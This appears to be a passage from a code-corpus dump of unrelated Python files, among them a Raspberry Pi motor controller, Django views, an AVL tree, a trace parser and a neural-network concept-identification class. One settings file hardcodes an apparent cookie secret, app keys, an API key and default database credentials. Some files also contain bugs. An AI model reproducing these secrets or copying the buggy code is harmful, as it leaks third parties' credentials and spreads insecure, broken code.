vpeak = H[i*scale_box:(i+1)*scale_box, j*scale_box:(j+1)*scale_box, k*scale_box:(k+1)*scale_box]\n sm = HSM[i*scale_box:(i+1)*scale_box, j*scale_box:(j+1)*scale_box, k*scale_box:(k+1)*scale_box]\n offset_pos = np.array([i*scale_box, j*scale_box, k*scale_box])\n templist = [temp for temp in range(scale_box)]\n pos = offset_pos + list(itertools.product(templist, templist, templist))\n if np.random.uniform(0,1)>split_probability:\n outdir = testdir\n else:\n outdir = traindir\n np.save(outdir + name, np.hstack((pos,vpeak.flatten().reshape(-1,1))))\n #np.save(outdir + labels, np.hstack((pos,sm.flatten().reshape(-1,1))))\n print(np.max(smf[:,3:5], axis=1).shape, )\n np.save(outdir + labels, np.hstack((binstellarmass(sm.flatten()).reshape(-1,1), np.max(smf[:,3:5], axis=1).reshape(-1,1)[12:26])))\n","repo_name":"chto/umml","sub_path":"preprocess/segment_simulation_UM.py","file_name":"segment_simulation_UM.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"70576844154","text":"import os\n\nfrom scrappo.downloader import Downloader\nfrom scrappo.utils.log import show\nfrom scrappo.video import Video\n\n\nclass Series(Video):\n def __init__(self, urls, output, file_name):\n super().__init__(urls, output)\n self.file_name = file_name\n\n def process_urls(self):\n parent_folder = self.add_folder(self.file_name)\n\n for i, season in enumerate(self.urls):\n show('Downloading season ' + str(i+1) + '...')\n season_folder = self.add_folder('season' + str(i+1), root=parent_folder)\n\n for j, episode in enumerate(season):\n url = episode['url']\n name = self.resolve_video_name(episode['name'], 'episode' + str(j + 1))\n show('Downloading ' + name + '...')\n\n path = os.path.join(season_folder, name + '.mp4')\n if self.file_exists(path):\n continue\n\n successful = Downloader(url, path).download_video()\n\n self.add_errors(successful, path, url)\n","repo_name":"zaytiri/scrappo","sub_path":"scrappo/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"38615552437","text":"import _thread\r\nimport time\r\nfrom typing import final\r\nimport serial\r\nimport RPi.GPIO as gpio\r\n\r\n#motor notations\r\nleft_motor_cw=31\r\nleft_motor_ccw=32\r\nright_motor_cw=15\r\nright_motor_ccw=16\r\n\r\n\r\ndef goforward():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.HIGH)\r\n gpio.output(right_motor_cw,gpio.HIGH)\r\n print('going forward')\r\n\r\ndef turnleft():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(right_motor_cw,gpio.HIGH)\r\n gpio.output(left_motor_cw,gpio.LOW)\r\n time.sleep(0.8)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n\r\ndef turnright():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.HIGH)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n time.sleep(0.8)\r\n gpio.outpu(left_motor_cw,gpio.LOW)\r\n\r\ndef gobackward():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_ccw,gpio.HIGH)\r\n gpio.output(right_motor_ccw,gpio.HIGH)\r\n\r\ndef stop():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.LOW)\r\n gpio.output(left_motor_ccw,gpio.LOW)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n gpio.output(right_motor_ccw,gpio.LOW)\r\n\r\ndef checkanddriveright():\r\n while int(distance[-1][0]) < 30:\r\n stop()\r\n print(int(distance[-1][0]))\r\n turnleft()\r\n print('turn left didnt work trying again')\r\n print('turn left worked now going forward')\r\n goforward()\r\n\r\ndef checkanddriveleft():\r\n while int(distance[-1][1]) < 30:\r\n stop()\r\n print(int(distance[-1][1]))\r\n turnright()\r\n print('turn right didnt work trying again')\r\n print('turn right worked now going forward')\r\n goforward() \r\n\r\n# Define a function for the thread\r\ndef serial_monitor(iss):\r\n gpio.setmode(gpio.BOARD)\r\n gpio.setwarnings(False)\r\n gpio.setup(left_motor_cw,gpio.OUT)\r\n gpio.setup(left_motor_ccw,gpio.OUT)\r\n gpio.setup(right_motor_cw,gpio.OUT)\r\n gpio.setup(right_motor_ccw,gpio.OUT)\r\n global distance\r\n ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\r\n ser.reset_input_buffer()\r\n while True:\r\n if len(distance)>10:\r\n distance=[distance[-1]]\r\n if ser.in_waiting > 0:\r\n line = ser.readline().decode('ascii').rstrip()\r\n distance.append(line.split(' '))\r\n\r\n\r\ndef motor_control(ssi):\r\n goforward()\r\n while True:\r\n try:\r\n if int(distance[-1][0]) < 30:\r\n stop() \r\n print(int(distance[-1][0]))\r\n checkanddriveright()\r\n elif int(distance[-1][1]) < 30:\r\n stop()\r\n print(int(distance[-1][1]))\r\n checkanddriveleft()\r\n except KeyboardInterrupt:\r\n pass\r\n finally:\r\n gpio.cleanup()\r\n\r\ndistance=[]\r\ntry:\r\n _thread.start_new_thread(serial_monitor,(1,))\r\n _thread.start_new_thread(motor_control,(1,))\r\nexcept KeyboardInterrupt:\r\n print (\"Error: unable to start thread\")\r\nfinally:\r\n gpio.cleanup()\r\nwhile 1:\r\n pass\r\ngpio.cleanup()\r\n\r\n","repo_name":"Huzaifahi7/RPi_GPIO","sub_path":"fullcode1.py","file_name":"fullcode1.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12687621603","text":"# cookie secret\nCOOKIE_SECRET = \"SSdsadasdX312312Csededddqw\"\nCOOKIE_DOMAIN = None\n\n# postgresql 配置\nPOSTGRESQL = {\n \"master\": {\n \"url\": \"postgresql://postgres:postgres@127.0.0.1/db0\",\n\n },\n # \"slave\": {\n # \"url\": \"postgresql://dbuser:111111@192.168.123.141/dprm\",\n # }\n}\n\n# redis 配置\nREDIS = {\n \"master\": {\n 'host': '127.0.0.1',\n 'port': 6379\n }\n}\nMONGO = {\n # \"dprm\": {\n # \"host\": \"mongodb://192.168.123.143\",\n # \"port\": 27017\n # }\n}\n# session 配置\nSESSION = {\n \"cookie\": \"session\",\n \"redis\": \"master\",\n}\n\nAPP_KEY = \"8635cab927cdb857d752eed5\"\nMASTER_SECRET = \"c4db0bd0dceb7b5a9876596a\"\n\nAPI_KEY_BAIDU_KEYWORD_RANK_PC = \"288FA7C57EAB4312A96E440279DF7690\"\n","repo_name":"zljk0306/ST","sub_path":"web/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42499495416","text":"class AVLTreeMap:\n def __init__(self, key, value):\n self.key = key\n self.val = value\n self.left = None \n self.right = None \n self.height = 0\n \n def get(self, root, key):\n if not root:\n return None\n elif key < root.key:\n root.left = self.get(root.left, key)\n elif key > root.key:\n root.right = self.get(root.right, key)\n else:\n return root.val\n \n\n def put(self, root, key, value):\n # Step 1 - Perform normal BST\n if not root:\n return AVLTreeMap(key, value)\n elif key < root.key:\n root.left = self.put(root.left, key, value)\n else:\n root.right = self.put(root.right, key, value)\n # Step 2 - Update the height of the ancestor node\n root.height = 1 + max(self.getHeight(root.left),\n self.getHeight(root.right))\n # Step 3 - Get the balance factor\n balance = self.getBalance(root)\n # Step 4 - If the node is unbalanced, \n # then try out the 4 cases\n # Case 1 - Left Left\n if balance > 1 and key < root.left.key:\n return self.rightRotate(root)\n # Case 2 - Right Right\n if balance < -1 and key > root.right.key:\n return self.leftRotate(root)\n # Case 3 - Left Right\n if balance > 1 and key > root.left.key:\n root.left = self.leftRotate(root.left)\n return self.rightRotate(root)\n # Case 4 - Right Left\n if balance < -1 and key < root.right.val:\n root.right = self.rightRotate(root.right)\n return self.leftRotate(root)\n return root\n \n\n\n def getBalance(self, root):\n if not root:\n return 0\n return self.getHeight(root.left) - self.getHeight(root.right)\n \n def getHeight(self, root):\n if not root:\n return 0\n return root.height\n\n def rightRotate(self, z):\n y = z.left\n T3 = y.right\n # Perform rotation\n y.right = z\n z.left = T3\n # Update heights\n z.height = 1 + max(self.getHeight(z.left),\n self.getHeight(z.right))\n y.height = 1 + max(self.getHeight(y.left),\n self.getHeight(y.right))\n # Return the new root\n return y\n\n \n def leftRotate(self, z):\n y = z.right\n T2 = y.left\n # Perform rotation\n y.left = z\n z.right = T2\n # Update heights\n z.height = 1 + max(self.getHeight(z.left),\n self.getHeight(z.right))\n y.height = 1 + max(self.getHeight(y.left),\n self.getHeight(y.right))\n # Return the new root\n return y\n \n def inOrder(self, root): \n if not root: \n return\n self.preOrder(root.left) \n print(\"{0} \".format(root.val), end=\"\") \n self.preOrder(root.right) \n\nif __name__ == '__main__': \n avl = AVLTreeMap(15, 'bob')\n avl.put(avl, 20, 'anna')\n avl.put(avl, 24, 'tom')\n avl.put(avl, 10, 'david')\n avl.put(avl, 13, 'david')\n avl.put(avl, 7, 'ben')\n avl.put(avl, 30, 'karen')\n avl.put(avl, 36, 'erin')\n avl.put(avl, 25, 'david')\n # print(avl.inOrder(avl))\n print(avl.get(avl, 24))\n print(avl.height)","repo_name":"seb7wake/data_structures","sub_path":"19SSLW-A2/avlTreeMap.py","file_name":"avlTreeMap.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17987013116","text":"from django.contrib.auth.mixins import LoginRequiredMixin\r\nfrom django.shortcuts import render\r\nfrom django.urls import reverse_lazy\r\nfrom django.views import generic\r\n\r\nfrom pet_app.forms import (\r\n SpeciesSearchForm,\r\n PetSearchForm,\r\n BrandSearchForm,\r\n PetOwnerSearchForm,\r\n PetOwnerCreationForm,\r\n PetOwnerUpdateForm,\r\n PetFoodSearchForm,\r\n)\r\nfrom pet_app.models import Pet, PetOwner, PetFood, Species, Brand\r\n\r\n\r\ndef index(request):\r\n num_pet_owners = PetOwner.objects.count()\r\n num_pets = Pet.objects.count()\r\n num_brands = Brand.objects.count()\r\n num_foods = PetFood.objects.count()\r\n num_species = Species.objects.count()\r\n\r\n context = {\r\n \"num_pet_owners\": num_pet_owners,\r\n \"num_pets\": num_pets,\r\n \"num_brands\": num_brands,\r\n \"num_foods\": num_foods,\r\n \"num_species\": num_species,\r\n }\r\n\r\n return render(request, \"pet_app/index.html\", context=context)\r\n\r\n\r\nclass SpeciesListView(LoginRequiredMixin, generic.ListView):\r\n model = Species\r\n context_object_name = \"species_list\"\r\n template_name = \"pet_app/species_list.html\"\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(SpeciesListView, self).get_context_data(**kwargs)\r\n species = self.request.GET.get(\"species\", \"\")\r\n context[\"search_form\"] = SpeciesSearchForm(\r\n initial={\"species\": species}\r\n )\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Species.objects.all()\r\n form = SpeciesSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(\r\n species__icontains=form.cleaned_data[\"species\"]\r\n )\r\n return queryset\r\n\r\n\r\nclass SpeciesCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = Species\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass SpeciesUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Species\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass SpeciesDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Species\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass PetListView(LoginRequiredMixin, generic.ListView):\r\n model = Pet\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetListView, self).get_context_data(**kwargs)\r\n nickname = self.request.GET.get(\"nickname\", \"\")\r\n context[\"search_form\"] = PetSearchForm(initial={\"nickname\": nickname})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Pet.objects.prefetch_related(\"owner\", \"species\")\r\n form = PetSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(\r\n nickname__icontains=form.cleaned_data[\"nickname\"]\r\n )\r\n return queryset\r\n\r\n\r\nclass PetDetailView(LoginRequiredMixin, generic.DetailView):\r\n queryset = Pet.objects.select_related(\"owner\")\r\n model = Pet\r\n\r\n\r\nclass PetCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = Pet\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass PetUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Pet\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass PetDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Pet\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass BrandListView(LoginRequiredMixin, generic.ListView):\r\n model = Brand\r\n context_object_name = \"brand_list\"\r\n template_name = \"pet_app/brand_list.html\"\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(BrandListView, self).get_context_data(**kwargs)\r\n name = self.request.GET.get(\"name\", \"\")\r\n context[\"search_form\"] = BrandSearchForm(initial={\"name\": name})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Brand.objects.prefetch_related(\"pet_foods\")\r\n form = BrandSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(name__icontains=form.cleaned_data[\"name\"])\r\n return queryset\r\n\r\n\r\nclass BrandCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = Brand\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass BrandUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Brand\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass BrandDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Brand\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass PetOwnerListView(LoginRequiredMixin, generic.ListView):\r\n queryset = PetOwner.objects.prefetch_related(\"pets\")\r\n model = PetOwner\r\n context_object_name = \"pet_owner_list\"\r\n template_name = \"pet_app/pet_owner_list.html\"\r\n paginate_by = 8\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetOwnerListView, self).get_context_data(**kwargs)\r\n username = self.request.GET.get(\"username\", \"\")\r\n context[\"search_form\"] = PetOwnerSearchForm(\r\n initial={\"username\": username}\r\n )\r\n return context\r\n\r\n def get_queryset(self):\r\n form = PetOwnerSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return self.queryset.filter(\r\n username__icontains=form.cleaned_data[\"username\"]\r\n )\r\n return self.queryset\r\n\r\n\r\nclass PetOwnerDetailView(LoginRequiredMixin, generic.DetailView):\r\n model = PetOwner\r\n queryset = PetOwner.objects.prefetch_related(\"pets__species\")\r\n context_object_name = \"pet_owner\"\r\n template_name = \"pet_app/pet_owner_detail.html\"\r\n\r\n\r\nclass PetOwnerCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = PetOwner\r\n form_class = PetOwnerCreationForm\r\n template_name = \"pet_app/pet_owner_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetOwnerUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = PetOwner\r\n form_class = PetOwnerUpdateForm\r\n template_name = \"pet_app/pet_owner_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetOwnerDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = PetOwner\r\n template_name = \"pet_app/pet_owner_confirm_delete.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetFoodListView(LoginRequiredMixin, generic.ListView):\r\n model = PetFood\r\n context_object_name = \"pet_food_list\"\r\n template_name = \"pet_app/pet_food_list.html\"\r\n paginate_by = 8\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetFoodListView, self).get_context_data(**kwargs)\r\n title = self.request.GET.get(\"title\", \"\")\r\n context[\"search_form\"] = PetFoodSearchForm(initial={\"title\": title})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = PetFood.objects.select_related(\"brand\")\r\n form = PetFoodSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(title__icontains=form.cleaned_data[\"title\"])\r\n return queryset\r\n\r\n\r\nclass PetFoodDetailView(LoginRequiredMixin, generic.DetailView):\r\n model = PetFood\r\n queryset = PetFood.objects.all()\r\n context_object_name = \"pet_food\"\r\n template_name = \"pet_app/pet_food_detail.html\"\r\n\r\n\r\nclass PetFoodCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = PetFood\r\n fields = \"__all__\"\r\n template_name = \"pet_app/pet_food_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n\r\n\r\nclass PetFoodUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = PetFood\r\n fields = \"__all__\"\r\n template_name = \"pet_app/pet_food_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n\r\n\r\nclass PetFoodDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = PetFood\r\n template_name = \"pet_app/pet_food_confirm_delete.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n","repo_name":"N1khto/pet-owner-service","sub_path":"pet_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8852875881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 14 20:32:16 2021\n\n@author: vitor\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport matplotlib.dates as pltd\nimport sqlite3\n\n# ouverture d'une connexion avec la base de données\nconn = sqlite3.connect('Temperature_DB.db')\nc = conn.cursor()\n\n\n#pour recuperer station + temperature maximale\nreq = (\"SELECT Numéro, Temp_maximales FROM 'Historiques_Temp'\")\nc.execute(req)\nr = c.fetchall()\nL = len(r)\n \n\n#pour recuperer liste des station\n#req = (\"SELECT * FROM 'stations-meteo'\")\n#c.execute(req)\n#liste_stations = c.fetchall()\n#data = []\n\n#for station in liste_stations:\n# donnee = {}\n# donnee['num']=station[0]\n# donnee['ville']=station[1]\n# donnee['lat']=station[2]\n# donnee['lon']=station[3]\n# donnee['alt']=station[4]\n# data.append(donnee)\n \n \n\ndef position_stations():\n \"\"\"donne la longitude, la latitude et altitude des stations \"\"\"\n conn = sqlite3.connect('Temperature_DB.db')\n curseur = conn.cursor()\n curseur.execute(\"SELECT Numero, Ville, Longitude, Latitude FROM 'stations-meteo'\")\n liste_stations = c.fetchall()\n a=[]\n for station in liste_stations:\n donnee = {}\n donnee['num']=station[0]\n donnee['ville']=station[1]\n donnee['lat']=station[2]\n donnee['lon']=station[3]\n a.append(donnee)\n return a\n\n\n\ndef get_temp(nom_stat,tmoy,tmin,tmax,debut,fin):\n try:\n fin=int(fin[:4]+fin[5:7]+fin[8:])\n debut=int(debut[:4]+debut[5:7]+debut[8:])\n conn = sqlite3.connect('Temperature_DB.db')\n curseur = conn.cursor()\n if tmoy:\n curseur.execute(\"SELECT Temp_moyennes, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_moyennes= ? AND C.DATE > ? AND C.DATE < ? \",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n elif tmax:\n curseur.execute(\"SELECT Temp_maximales, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_maximales= ? AND C.DATE > ? AND C.DATE < ? \",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n else:\n curseur.execute(\"SELECT Temp_minimales, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_minimales= ? AND C.DATE > ? AND C.DATE < ? \",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n t=[]\n for x in tmoy_i:\n z=str(x[1])\n s=(z[:4],z[4:6],z[6:])\n t.append((x[0]/10,s))\n return t\n \n except Exception as err: # interception d'une exception quelconque\n print('Exception: ', type(err).__name__)\n print('err: ', str(err))\n \n","repo_name":"kasumi993/Temperature_Map","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70052523512","text":"import core\n\nclass TraceParser(object):\n def __init__(self, caboodle, *args, **kwargs):\n self.caboodle = caboodle\n\n def parse(self, filename):\n func_cache = {}\n def get_synthetic_func(objname, funcname):\n '''\n For native functions, create a synthetic file if it does not exist\n and a synthetic function in that file if it does not exist.\n '''\n synth_file = self.caboodle.base_name_to_file.get(objname)\n if synth_file is None:\n synth_file = core.SourceFile(objname, 'synthetic')\n self.caboodle.append(synth_file)\n \n func, created = synth_file.get_or_create_function(funcname)\n return func\n \n def get_func(filename, funcname, lineno):\n '''\n Given a filename and lineno (and ignoring the funcname), look-up the\n function in the given file.\n '''\n ctupe = (filename, lineno)\n func = func_cache.get(ctupe)\n \n if not ctupe in func_cache:\n source_file = self.caboodle.base_name_to_file.get(filename)\n # try it as an impl\n if source_file is None:\n source_file = self.caboodle.impl_name_to_file.get(filename)\n if source_file is None:\n raise Exception('Unable to locate source file: %s' % filename)\n \n # import is a special case!\n if funcname == 'import' and lineno == 1:\n func = source_file.import_function\n else:\n func = source_file.get_func_by_line(lineno)\n \n if func is None:\n raise Exception('Unable to translate '\n '%s,%d to a function (hint: %s)' %\n (filename, lineno, funcname))\n \n func_cache[ctupe] = func\n else:\n func = func_cache[ctupe]\n \n return func\n \n \n f = open(filename, 'r')\n \n # Let's do a quick pass where we find out the earliest time we see...\n start_ts = None\n max_te = 0\n for line in f:\n line = line.strip()\n if not ',' in line:\n continue\n \n line_type = line[0]\n \n if line_type == 'r':\n (line_type, context_str, depth_str, ts_str, te_str,\n filename, objname, funcname,\n lineno_str, caller_filename, caller_lineno_str\n ) = line.split(',')\n depth, ts, te = int(depth_str, 16), int(ts_str, 16), int(te_str, 16)\n \n if start_ts is not None:\n start_ts = min(start_ts, ts)\n else:\n start_ts = ts\n \n max_te = max(te, max_te)\n \n # because trace events are generated only on function returns, we\n # need to accumulate things until we hit our parents...\n MAX_RECURSE_DEPTH = 128\n context_to_deferreds = {}\n \n self.caboodle.max_time_value = max_te - start_ts\n \n f.seek(0)\n for line in f:\n line = line.strip()\n if not ',' in line:\n continue\n\n line_type = line[0]\n \n # since we do store the entire path for 'e' cases, we can use this\n # to dis-ambiguate duplicate file names (although there are better\n # possible solutions; we could probably whittle some files out of\n # concern by knowing no .xul file uses it, or just have our probes\n # not have to use basename)\n if line_type == 'e':\n (line_type, path, lineno_str) = line.split(',')\n if path.startswith('chrome://'):\n chrome_path = path[9:]\n sf = self.caboodle.get_file_from_chrome_path(chrome_path)\n # er, and we do this by just overwriting the base_name entry\n # for this dude. this results in a MRU cached entry...\n # (only do this if we find a source file... this won't be\n # the case for .xul jerks...)\n if sf:\n self.caboodle.base_name_to_file[sf.base_name] = sf\n \n if line_type != 'r':\n continue\n \n (line_type, context_str_, depth_str, ts_str, te_str,\n filename, objname, funcname,\n lineno_str, caller_filename, caller_lineno_str\n ) = line.split(',')\n depth, ts, te = int(depth_str, 16), int(ts_str, 16), int(te_str, 16)\n lineno = int(lineno_str)\n \n ts -= start_ts\n te -= start_ts\n\n # -- find our function and log this invocation of our function\n # brutally mis-attribute .xul files for now using the last func\n if filename.endswith('.xul'):\n pass\n # the native function case; use a synthetic function\n elif filename == '':\n # okay, so in this case objname is a real thing, and funcname\n # is a real function name, but our source_file stuff will know\n # nothing about them...\n func = get_synthetic_func(objname, funcname)\n # an interpreted function; use our awesome parsing results\n else:\n func = get_func(filename, funcname, lineno)\n this_invoc = func.log_invoke(ts, te, depth, depth)\n \n if context_str in context_to_deferreds:\n deferreds = context_to_deferreds[context_str]\n else:\n deferreds = [list() for i in range(MAX_RECURSE_DEPTH)]\n context_to_deferreds[context_str] = deferreds\n \n # queue up this invocation for later consumption by our parent\n deferreds[depth-1].append(this_invoc)\n \n # log any calls we made that are waiting for us...\n if deferreds[depth]:\n for deferred in deferreds[depth]:\n this_invoc.log_call(deferred)\n deferreds[depth] = list()\n \n # fix-up source file weights...\n for source_file in self.caboodle.source_files:\n for func in source_file.functions_with_line.values():\n source_file.inclusive_weight += func.inclusive_weight\n source_file.exclusive_weight += func.exclusive_weight\n","repo_name":"asutherland/pecobro","sub_path":"pecobro/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32072415190","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport pdb\nimport os\nimport cv2 \nimport keras\nimport random\nimport numpy as np\nfrom glob import glob\nimport SimpleITK as sitk\nimport pandas as pd\nfrom ..helpers.utils import *\nfrom ..spatial.dissection import Dissector\nfrom ..spatial.flow import singlelayercam\nfrom keras.models import Model\nfrom skimage.transform import resize as imresize\nfrom keras.utils import np_utils\nfrom keras import layers\nfrom keras.models import Sequential\nimport keras.backend as tf\nfrom copy import deepcopy\n\nimport matplotlib.gridspec as gridspec\nfrom scipy.ndimage.measurements import label\nfrom scipy.ndimage.morphology import binary_dilation, generate_binary_structure\n\n\nclass ConceptIdentification():\n \"\"\"\n Network Dissection analysis\n\n model : keras model initialized with trained weights\n layer_name : intermediate layer name which needs to be analysed\n \"\"\"\n\n def __init__(self, model, weights_pth, metric= None, nclasses=4):\n\n self.model = model\n self.metric = metric\n self.weights = weights_pth\n self.nclasses = nclasses\n self.model.load_weights(self.weights, by_name = True)\n\n\n def _get_layer_idx(self, layer_name):\n \"\"\"\n \"\"\"\n for idx, layer in enumerate(self.model.layers):\n if layer.name == layer_name:\n return idx\n\n def save_concepts(self, img, concepts, nrows, ncols, name, save_path=None):\n \"\"\"\n creats a grid of image and saves if path is given\n\n img : test image\n concepts: all features vectors\n nrows : number of rows in an image\n ncols : number of columns in an image\n save_path : path to save an image\n \"\"\"\n\n plt.figure(figsize=(5, 5))\n gs = gridspec.GridSpec(nrows, ncols)\n gs.update(wspace=0.025, hspace=0.05)\n \n for i in range(nrows):\n for j in range(ncols):\n try:\n concept = concepts[:,:,i*nrows +(j)]\n ax = plt.subplot(gs[i, j])\n im = ax.imshow(np.squeeze(img), cmap='gray')\n im = ax.imshow(concept, cmap = get_transparent_cmap('hot_r'), vmin = 0, vmax = 3)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n except:\n pass\n \n if save_path:\n if not os.path.exists(save_path): \n os.makedirs(save_path)\n plt.savefig(os.path.join(save_path, name+'.png'), bbox_inches='tight')\n else:\n plt.show()\n\n def identify(self, concept_info, \n dataset_path, \n save_path, \n loader,\n test_img,\n img_ROI = None):\n \"\"\"\n test significance of each concepts\n\n concept: {'concept_name', layer_name', 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n img_ROI:\n \"\"\"\n layer_name = concept_info['layer_name'] \n self.dissector = Dissector(self.model, layer_name)\n\n threshold_maps = self.dissector.get_threshold_maps(dataset_path, save_path, percentile = 85, loader=loader)\n\n concepts = self.dissector.apply_threshold(test_img, threshold_maps,\n post_process_threshold = 80,\n ROI=img_ROI)\n\n node_idxs = concept_info['filter_idxs']\n concepts = concepts[:, :, node_idxs]\n\n if save_path:\n nrows = int(len(node_idxs)**.5) + 1\n self.save_concepts(test_img, concepts, nrows, nrows, concept_info['concept_name'], save_path = save_path)\n\n # some statistics on concepts\n mean_concept = np.round(np.mean(concepts, axis=2)[:,:,None])\n self.save_concepts(test_img, mean_concept, 1, 1, concept_info['concept_name']+'mean', save_path = save_path)\n\n return concepts\n\n def get_layer_idx(self, layer_name):\n for idx, layer in enumerate(self.model.layers):\n if layer.name == layer_name:\n return idx\n\n def flow_based_identifier(self, concept_info, \n save_path, \n test_img,\n base_grad=False):\n \"\"\"\n test significance of each concepts\n\n concept: {'concept_name', layer_name', 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n \"\"\"\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n total_filters = np.arange(np.array(self.model.layers[node_idx].get_weights())[0].shape[-1])\n test_filters = np.delete(total_filters, node_idxs)\n\n if base_grad == False:\n occluded_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n for j in test_filters:\n occluded_weights[0][:,:,:,j] = 0\n try:\n occluded_weights[1][j] = 0\n except: 